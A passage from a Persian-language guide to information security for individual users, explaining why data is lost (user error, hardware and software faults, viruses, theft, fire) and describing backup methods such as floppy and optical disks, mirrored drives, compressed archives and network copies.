.ﺿﻤﻨﹰﺎ ﺗﻮﺟﻪ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺑﺮﻕﮔﺮﻓﺘﮕﻲ ﻻﺯﻡ ﺍﺳﺖ ﺑـﺪﻥ ﺷﻤﺎ ﺑﺎ ﺯﻣﻴﻦ ﺩﺭ ﺗﻤﺎﺱ ﺩﺍﺋﻢ ﺑﺎﺷﺪ. ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﺧﻮﺩ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ١٧ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ ﺩﺭ ﻗﺴﻤﺖ ﻗﺒﻞ ﻣﻄﺎﻟﺒﻲ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﺠﺎﺩ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺁﻣـﺪ .ﺩﺭ ﺍﻳﻦ ﻗﺴﻤﺖ ﻣﻮﺍﺭﺩﻱ ﺷﺮﺡ ﺩﺍﺩﻩ ﺧﻮﺍﻫﻨﺪ ﺷـﺪ ﻛـﻪ ﺑﻮﺳـﻴﻠﺔ ﺁﻧﻬـﺎ ﻣﻲﺗﻮﺍﻥ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﺮﺩ ﻛﻪ ﺩﺍﺩﻩﻫﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺯ ﺣﻔﺎﻇﺖ ﻛﺎﻣﻞ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ .ﺷﻤﺎ ﭼﮕﻮﻧﻪ ﺍﺯ ﺩﺍﺩﻩﻫﺎ ﻭ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﺔ ﺧﻮﺩ ﺣﻔﺎﻇﺖ ﻣﻲﻛﻨﻴﺪ؟ ﺑﻪ ﭼﻨﺪ ﺩﻟﻴﻞ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺩﻩﻫﺎ ﺍﺯ ﺑﻴﻦ ﺑﺮﻭﻧﺪ ﻛﻪ ﺑﺮﺧﻲ ﺍﺯ ﺁﻧﻬﺎ ﺩﺭ ﺯﻳﺮ ﺁﻣﺪﻩ ﺍﺳﺖ: • • Case Logical Access Personal Digital Assistants 14 15 16 ﭘﺎﻙ ﺷﺪﻥ ﺍﺗﻔﺎﻗﻲ ﻓﺎﻳﻞ؛ ﺩﺯﺩﻳﺪﻩ ﺷﺪﻥ ﺭﺍﻳﺎﻧﻪ؛ Backups 17 ٥٧ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ • • • • • ﻳﻜﻲ ﺍﺯ ﺭﺍﻩﺣﻠﻬﺎ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﻳﻦ ﺗﻬﺪﻳﺪﺍﺕ ،ﺗﻬﻴﺔ ﻧﺴﺨﻪﻫـﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻣﻲﺑﺎﺷﺪ .ﻧﺴﺨﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺑﻪ ﺧﻮﺩﻱ ﺧﻮﺩ ﻳﻚ ﻛﭙـﻲ ﺍﺯ ﻓﺎﻳﻞ ﻳﺎ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺍﻧﺘﻘﺎﻝ ﺑﻪ ﻳﻚ ﺩﻳﺴﻚ ﻓﻼﭘﻲ ﻭ ﻳﺎ ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﺍﺯ ﺁﻥ ﻧﮕﻬﺪﺍﺭﻱ ﻣـﻲﺷـﻮﺩ .ﭼﻨﺎﻧﭽـﻪ ﻓﺎﻳﻞ ﺍﺻﻠﻲ ﺑﻪ ﻫﺮ ﺩﻟﻴﻠﻲ ﺍﺯ ﺑﻴﻦ ﺑﺮﻭﺩ ﻳﺎ ﭘﺎﻙ ﺷﻮﺩ ﻣـﻲﺗـﻮﺍﻥ ﺍﺯ ﻧﺴﺨﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ ﻭ ﺁﻧﺮﺍ ﺟﺎﻳﮕﺰﻳﻦ ﻓﺎﻳﻞ ﻗﺒﻠﻲ ﻧﻤﻮﺩ. ﻗﺎﻧﻮﻥ ﺩﻭﻡ: ﻣﺮﺗﺒ ﹰﺎ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﺪ ﻭ ﺍﮔﺮ ﺭﺍﻳﺎﻧـﻪ ﺩﺭ ﻣﻌـﺮﺽ ﺗﻬﺪﻳﺪ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻧﻜﺎﺕ ﺣﻔﺎﻇﺘﻲ ﺭﺍ ﺑﻜﺎﺭ ﮔﻴﺮﻳﺪ. ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩ ﻭ ﻳﺎ ﺑـﺴﻴﺎﺭ ﭘﻴﭽﻴـﺪﻩ ﺑﺎﺷﻨﺪ )ﺍﺯ ﺳﺎﺩﻩﺗﺮﻳﻦ ﺍﻧﻮﺍﻉ ﭘﺸﺘﻴﺒﺎﻥ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻳﻚ ﺩﻳﺴﻚ ﻓﻼﭘـﻲ ﻛـﻪ ﺍﺯ ﺁﻥ ﺩﺭ ﻛﺸﻮﻱ ﻣﻴـﺰ ﻛـﺎﺭ ﺧـﻮﺩ ﻧﮕﻬـﺪﺍﺭﻱ ﻣـﻲﻛﻨﻴـﺪ ﺍﺷـﺎﺭﻩ ﻛـﺮﺩ( .ﺍﻛﺜـﺮ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮ ﺑﻪ ﺷﻤﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﻓﺎﻳﻠﻲ ﺭﺍ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﺧﻮﺩ ﺩﺍﺭﻳﺪ ﺑﻪ ﺭﻭﻱ ﻧﻮﺍﺭﻫـﺎﻱ ﻣﻐﻨﺎﻃﻴـﺴﻲ ﻭ ﻳـﺎ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ١٩ﻛﭙﻲ ﻛﻨﻴﺪ .ﭼﻨﺎﻧﭽـﻪ ﺭﺍﻳﺎﻧـﺔ ﺷﻤﺎ ﺩﺯﺩﻳﺪﻩ ﺷﻮﺩ ،ﺑﺎ ﺧﺮﻳﺪ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺟﺪﻳﺪ ﺑﺎ ﺳﺎﺧﺘﺎﺭﻱ ﻣـﺸﺎﺑﻪ ﺭﺍﻳﺎﻧﺔ ﻗﺪﻳﻤﻲ ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻗﺎﺩﺭ ﺧﻮﺍﻫﻴـﺪ ﺑﻮﺩ ﻓﺎﻳﻠﻬﺎﻱ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻪ ﺭﺍ ﻣﺠﺪﺩﹰﺍ ﺑﻜﺎﺭ ﮔﻴﺮﻳﺪ. 
ﻧﻘﺎﻳﺺ ،ﺗﺼﺎﺩﻓﺎﺕ ،ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ ﻭ ﺣﻤﻼﺕ ﻣﻬـﺎﺟﻤﻴﻦ ﻗﺎﺑـﻞ ﻻ ﻋﻠﻴـﺮﻏﻢ ﺗﻼﺷـﻬﺎﻱ ﺯﻳـﺎﺩ ﺑـﺮﺍﻱ ﭘﻴﺶ ﺑﻴﻨـﻲ ﻧﻴـﺴﺘﻨﺪ .ﻣﻌﻤـﻮ ﹰ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﻧﻤﻲﺗﻮﺍﻥ ﺍﺯ ﺑﺮﻭﺯ ﺑﻌﻀﻲ ﺍﺯ ﻣﺸﻜﻼﺕ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﻮﺩ ،ﻭﻟﻲ ﺍﮔﺮ ﭘـﺸﺘﻴﺒﺎﻥ ﻣﻨﺎﺳـﺐ ﺗﻬﻴـﻪ ﻛـﺮﺩﻩ ﺑﺎﺷـﻴﺪ ﺣـﺪﺍﻗﻞ Hard Disk CD-ROMs 18 19 ﺩﻻﻳﻞ ﮔﻮﻧﺎﮔﻮﻧﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺎﻋﺚ ﻣﻲﺷـﻮﻧﺪ ﻧـﺴﺨﻪﻫـﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺟﺰﺍﻱ ﻛﻠﻴﺪﻱ ﻭ ﻣﻬﻤﻲ ﺩﺭ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﻫـﺎ ﻣﺤـﺴﻮﺏ ﺷﻮﻧﺪ: ﺧﻄﺎﻱ ﻛﺎﺭﺑﺮ ﺑﻌﻀﻲ ﺍﺯ ﺍﻓﺮﺍﺩ ﺑﺮﺧﻲ ﻣﻮﺍﻗﻊ ﺑﻄـﻮﺭ ﻧﺎﺧﻮﺍﺳـﺘﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﺧـﻮﺩ ﺭﺍ ﭘﺎﻙ ﻣﻲﻛﻨﻨﺪ .ﺩﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻭﺍﺳـﻄﻬﺎﻱ ﮔﺮﺍﻓﻴﻜـﻲ ﻛـﺎﺭﺑﺮ ﺍﻳـﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻳﻚ ﻓﺎﻳﻞ ﻳﺎ ﺷـﺎﺧﻪ ﺑﻄـﻮﺭ ﻧﺎﺧﻮﺍﺳـﺘﻪ ﺑـﻪ ﻣﻜﺎﻧﻲ ﻧﺎﺩﺭﺳﺖ ﻣﻨﺘﻘﻞ ﺷﻮﺩ .ﺍﻣﺎ ﭼﻨﺎﻧﭽﻪ ﻣﺮﺗﺒﹰﺎ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﺷﺪﻩ ﺑﺎﺷﺪ ﺍﻣﻜﺎﻥ ﺑﺎﺯﻳﺎﺑﻲ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﺑﻄﻮﺭ ﺍﺗﻔﺎﻗﻲ ﭘـﺎﻙ ﺷﺪﻩﺍﻧﺪ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺩﺭ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﺷﺘﺒﺎﻫﺎﺕ ﻛﻮﭼﻚ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﺭﺍﻫﻜﺎﺭ ﭘﻴﺸﮕﻴﺮﺍﻧﻪ ﺧﻮﺑﻲ ﺑﺎﺷﺪ. ﻧﻘﺺ ﺩﺭ ﺳﺨﺖﺍﻓﺰﺍﺭ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﻫـﺮ ﺯﻣـﺎﻧﻲ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﭼـﺎﺭ ﺧﺮﺍﺑﻲ ﺷﻮﺩ ﻭ ﺑﺎﻋﺚ ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻦ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﻃﻮﻝ ﻳـﻚ ﻓﺮﺁﻳﻨـﺪ ﮔﺮﺩﺩ .ﺻﺪﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺑﻪ ﺩﻳﺴﻚ ﻭﺍﺭﺩ ﻣﻲﺷـﻮﺩ ﻧﻴـﺰ ﻣـﻲﺗﻮﺍﻧـﺪ ﻣﻨﺠﺮ ﺑﻪ ﺗﺨﺮﻳﺐ ﻛﺎﻣﻞ ﺩﻳﺴﻚ ﺷـﻮﺩ .ﻭﻟـﻲ ﭼﻨﺎﻧﭽـﻪ ﺍﺯ ﻓﺎﻳﻠﻬـﺎ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ ﺷـﺪﻩ ﺑﺎﺷـﺪ ﻣـﻲﺗـﻮﺍﻥ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﻣﺠـﺪﺩﹰﺍ ﺭﻭﻱ ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ﻭ ﻳﺎ ﺳﻴﺴﺘﻢ ﺟﺪﻳﺪ ﺑﺎﺯﻳﺎﺑﻲ ﻧﻤﻮﺩ. ﻧﻘﺺ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﻛﺜﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﺜﻞ Microsoft Wordﻭ Excel ﻭ Accessﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎﻋﺚ ﺍﺯ ﺑﻴﻦ ﺭﻓـﺘﻦ ﻧﺎﺧﻮﺍﺳـﺘﺔ ﻓﺎﻳﻠﻬـﺎﻱ ﺩﺍﺩﻩ ﺷﻮﻧﺪ .ﺍﮔﺮ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭ ﺑﺮﻧﺎﻣﺔ ﻛـﺎﺭﺑﺮﺩﻱ ﻞ ﻛﺎﺭﻱ ﺷﻤﺎ ﺭﺍ ﭘـﺎﻙ ﺷﻤﺎ ﻧﺎﮔﻬﺎﻥ ﻧﻴﻤﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺣﻴﺎﺗﻲ ﻓﺎﻳ ﹺ ﻛﻨﺪ ،ﺑﺎﺯ ﻫﻢ ﻗﺎﺩﺭ ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ ﺩﺍﺩﻩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻴﺪ. ﺑﺨﺶ ﺩﻭﻡ • ﺫﺧﻴﺮﺓ ﻧﺎﺧﻮﺍﺳﺘﻪ ﻳﻚ ﻓﺎﻳﻞ ﺑﺮ ﺭﻭﻱ ﻓﺎﻳﻞ ﺩﻳﮕﺮ؛ ﺭﻭﻧﺪ ﻧﺎﺩﺭﺳﺖ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻣﺪﻥ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﺑﺎﻋﺚ ﺗﻐﻴﻴﺮ ﻳﺎ ﭘﺎﻙ ﺷﺪﻥ ﺩﺍﺩﻩﻫﺎ ﺷﻮﺩ؛ ﻭﺟﻮﺩ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻣﺨﺮﺏ )ﻣﺜﻞ ﻭﻳﺮﻭﺱ( ﻛﻪ ﺑﺎﻋﺚ ﺗﻐﻴﻴـﺮ، ﺑﺎﺯﻧﻮﻳﺴﻲ ﻭ ﻳﺎ ﺣﺬﻑ ﺩﺍﺩﻩﻫﺎ ﺷﻮﺩ؛ ١٨ ﺑﺮﻭﺯ ﻣﺸﻜﻞ ﺩﺭ ﺳﺨﺖﺍﻓﺰﺍﺭ )ﻣﺜﻞ ﻣﺸﻜﻼﺕ ﺩﻳﺴﻚ ﺳﺨﺖ ، ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ،ﭘﺮﺩﺍﺯﺷﮕﺮ ﻭ ﻳﺎ ﻣﻨﺒﻊ ﺗﻐﺬﻳﻪ( ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﺑﺎﻋـﺚ ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻦ ﺩﺍﺩﻩﻫﺎ ﮔﺮﺩﺩ؛ ﺁﺗﺶﺳﻮﺯﻱ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﺏ ﺑﺮﺍﻱ ﺧﺎﻣﻮﺵ ﻛﺮﺩﻥ ﺭﺍﻳﺎﻧﺔ ﺳــﻮﺧﺘﻪ ،ﻛــﻪ ﺑﺎﻋــﺚ ﻏﻴﺮﻗﺎﺑــﻞ ﺑﺎﺯﻳــﺎﺑﻲ ﺷــﺪﻥ ﺩﺍﺩﻩﻫــﺎ ﻣﻲﺷﻮﺩ؛ ﻭ ... 
ﺩﺍﺩﻩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﻧﻤﻲﺩﻫﻴﺪ ﻭ ﺩﺭ ﺍﻛﺜﺮ ﻣﻮﺍﻗﻊ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻛﺮﺩﻩ ﻭ ﺑﻪ ﻳﻚ ﺣﺎﻟﺖ ﻣﺘﻌﺎﺩﻝ ﻭ ﻣﺎﻧﺪﮔﺎﺭ ﺑﺮﺳﺎﻧﻴﺪ .ﺣﺘﻲ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺗﻤﺎﻣﹰﺎ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘـﻪ ﺑﺎﺷﺪ ،ﭼﻨﺎﻧﭽﻪ ﻳﻚ ﻣﺠﻤﻮﻋﺔ ﻛﺎﻣﻞ ﺍﺯ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻗﺎﺩﺭ ﺧﻮﺍﻫﻴﺪ ﺑـﻮﺩ ﻫﻤـﺔ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺟﺪﻳﺪ ﺑﺎﺯﻳﺎﺑﻲ ﻛﻨﻴﺪ ﻭ ﻣﺠﺪﺩﹰﺍ ﺑـﻪ ﺁﻧﻬـﺎ ﺩﺳﺘﺮﺳـﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷــﻴﺪ .ﺍﻟﺒﺘــﻪ ﺍﻳــﻦ ﻣــﺴﺌﻠﻪ ﺻــﺮﻓﹰﺎ ﺯﻣــﺎﻧﻲ ﻛﺎﺭﺁﻣــﺪ ﺍﺳــﺖ ﻛــﻪ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺩﺭ ﺟﺎﻳﻲ ﻏﻴﺮ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﻗﺮﺑﺎﻧﻲ ﺫﺧﻴﺮﻩ ﺷـﺪﻩ ﺑﺎﺷﻨﺪ. ٥٨ ﻧﻔﻮﺫﻫﺎ ﻭ ﺗﺨﺮﻳﺒﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻬــﺎﺟﻤﻴﻦ ﻭ ﻭﻳﺮﻭﺳــﻬﺎﻱ ﻣﺨــﺮﺏ ﻣﺮﺗﺒ ـﹰﺎ ﺑﺎﻋــﺚ ﺗﻐﻴﻴــﺮ ﻭ ﻳــﺎ ﭘﺎﻙﺷﺪﻥ ﺩﺍﺩﻩﻫﺎ ﻣﻲﺷﻮﻧﺪ .ﻭﺟﻮﺩ ﻧﺴﺨﻪﻫﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨﻪ ﻧﻴﺰ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻛﻤﻚ ﺷﺎﻳﺎﻧﻲ ﻣﻲﻛﻨﺪ. ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﻳﻤﻨﻲ ﺩﺭ ﺑﺮﺍﺑﺮ ﺧﻄﺮﺍﺗﻲ ﻛﻪ ﺩﺭ ﺍﺩﺍﺭﻩ ﻭ ﻳـﺎ ﻣﻨـﺰﻝ ﺑـﺎ ﺁﻥ ﻣﻮﺍﺟـﻪ ﻫﺴﺘﻴﺪ ،ﻣﺆﺛﺮﺗﺮﻳﻦ ﺭﺍﻩ ﺍﺳﺖ. ﻼ ﭼﻨﺪ ﻣﻮﺭﺩ ﺍﺯ ﺷﻴﻮﻩﻫﺎﻱ ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺁﻣﺪﻩ ﺍﺳﺖ: ﺫﻳ ﹰ • ﻓﺎﻳﻠﻬــﺎﻱ ﺣــﺴﺎﺱ ﺧــﻮﺩ ﺭﺍ ﺭﻭﻱ ﺩﻳــﺴﻚ ﻓﻼﭘــﻲ، ﺩﻳﺴﻜﻬﺎﻱ ﻧﻮﺭﻱ ،ﻭ ﻳﺎ ﺩﻳﺴﻜﻬﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﺑﺎ ﻇﺮﻓﻴﺖ ﺑﺎﻻ ﻛﻪ ﻗﺎﺑﻠﻴﺖ ﭘﺎﻙﻛﺮﺩﻥ ﻧﻴﺰ ﺩﺭ ﺁﻧﻬﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛﭙـﻲ ﻛﻨﻴﺪ. • ﻣﺤﺘﻮﻳﺎﺕ ﺩﻳﺴﻚ ﺭﺍ ﺭﻭﻱ ﻳﻚ ﺩﻳـﺴﻚ ﺍﻧﻌﻜﺎﺳـﻲ ٢٠ﻳـﺎ ﺍﮔﺮ ﻓﻀﺎﻱ ﻛـﺎﻓﻲ ﻣﻮﺟـﻮﺩ ﺍﺳـﺖ ﺭﻭﻱ ﻳـﻚ ﺷـﺎﺧﻪ ﺩﺭ ﻫﻤﺎﻥ ﺩﻳﺴﻚ ﻣﺎﺩﺭ ﻛﭙﻲ ﻛﻨﻴﺪ .ﺍﻟﺒﺘﻪ ﺍﻳﻨﻜﺎﺭ ﺩﺭ ﺧﺮﺍﺑﻴﻬﺎﻱ ﺍﺳﺎﺳﻲ ﻛﻤﻚ ﭼﻨﺪﺍﻧﻲ ﻧﻤﻲﻛﻨﺪ ﻭ ﺻﺮﻓﹰﺎ ﺍﮔـﺮ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﺑﻄﻮﺭ ﻧﺎﺧﻮﺍﺳﺘﻪ ﭘﺎﻙ ﺷﻮﻧﺪ ﺑﻜﺎﺭ ﻣﻲﺁﻳﺪ. • ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺁﺭﺷﻴﻮ ﻓﺸﺮﺩﻩ ﺳـﺎﺯﻱﺷـﺪﻩﺍﻱ ﺍﺯ ﻓﺎﻳﻠﻬـﺎﻱ ﻣﻬﻢ ﺧـﻮﺩ ﺍﻳﺠـﺎﺩ ﻛﻨﻴـﺪ .ﺍﻟﺒﺘـﻪ ﻣـﻲﺗـﻮﺍﻥ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﻣﺮﺑﻮﻃــﻪ ﺭﺍ ﺭﻭﻱ ﻫﻤــﺎﻥ ﺳﻴــﺴﺘﻢ ﺍﻭﻟﻴــﻪ ﻭ ﻳــﺎ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻭ ﺩﺭ ﻣﻜﺎﻧﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ ﻣﺘﻔـﺎﻭﺕ ﻛﭙـﻲ ﻧﻤﻮﺩ. • ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺧﻮﺩ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﺮﺩﻩ ﻭ ﺍﺯ ﻃﺮﻳـﻖ ﺷـﺒﻜﻪ ﻳﺎ ﺍﻳﻨﺘﺮﻧﺖ ﺁﻧﺮﺍ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮﻱ ﻣﻨﺘﻘﻞ ﻛﻨﻴﺪ. • ﺍﮔﺮ ﺩﺭﻧﻈﺮ ﺩﺍﺭﻳﺪ ﻛﻪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺧﺮﺍﺑﻲ ﺩﻳﺴﻜﻬﺎﻱ ﺳﺨﺖ ﺍﺯ ﺍﻳﻤﻨﻲ ﺯﻳﺎﺩﻱ ﺑﺮﺧـﻮﺭﺩﺍﺭ ﺑﺎﺷـﻴﺪ ﺩﺭ ﺭﺍﻳﺎﻧـﺔ ﺧـﻮﺩ ﺍﺯ ﺩﻭ ﺩﻳﺴﻚ ﺳﺨﺖ ﻭ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻳﺎ ﺳﺨﺖ ﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺍﺯ ﻫـﺮ ﻓﺎﻳﻞ ﻳﻚ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻣﻲ ﻛﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴـﺪ .ﺍﻟﺒﺘـﻪ ﻻﺯﻡ ﺑﻪ ﺫﻛﺮ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺭﻋﺎﻳﺖ ﺗﻤﺎﻣﻲ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺑﺎﺯﻫﻢ ﺗﻬﻴﺔ ﻣﺪﺍﻭﻡ ﭘﺸﺘﻴﺒﺎﻥ ﺟﻬﺖ ﺣﻔﺎﻇﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﻣـﺸﻜﻼﺕ ﺩﻳﮕﺮ ﺿﺮﻭﺭﻱ ﻣﻲﺑﺎﺷﺪ. 
ﺍﻃﻼﻋﺎﺕ ﺑﺎﻳﮕﺎﻧﻲ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺑﻌﻨـﻮﺍﻥ ﺍﻃﻼﻋـﺎﺕ ﺑﺎﻳﮕـﺎﻧﻲﺷـﺪﻩ ﺗﻠﻘـﻲ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﺍﻣﻜﺎﻥ ﻣﻘﺎﻳﺴﺔ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﻭ ﺩﺍﺩﻩﻫـﺎﻱ ﺭﺍﻳـﺞ ﺑـﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﻗﺪﻳﻤﻲ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ .ﺍﻳـﻦ ﻗﺎﺑﻠﻴـﺖ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺑﺘﻮﺍﻧﻴﺪ ﻣﺸﺨﺺ ﻛﻨﻴﺪ ﻛﻪ ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﻋﻤﺪﹰﺍ ﻳـﺎ ﺳﻬﻮﹰﺍ ﺩﭼﺎﺭ ﺗﻐﻴﻴﺮ ﺷﺪﻩﺍﻧﺪ .ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈـﻮﺭ ﺍﮔـﺮ ﻧﺨﻮﺍﻫﻴـﺪ ﺑـﻪ ﻋﻘــﺐ ﺑﺮﮔــﺸﺘﻪ ﻭ ﺗﺎﺭﻳﺨﭽــﺔ ﻳــﻚ ﭘــﺮﻭﮊﻩ ﺭﺍ ﺑﺎﺯﺳــﺎﺯﻱ ﻛﻨﻴــﺪ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻣﻨﺎﺑﻊ ﺍﺭﺯﺷﻤﻨﺪﻱ ﺑﺸﻤﺎﺭ ﻣﻲﺁﻳﻨﺪ. ﺳﺮﻗﺖ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﻓﺮﻭﺵ ﺁﻧﻬﺎ ﻛﺎﺭ ﺑﺴﻴﺎﺭ ﺁﺳﺎﻧﻲ ﺍﺳﺖ .ﺑـﺎ ﺗﻮﺟـﻪ 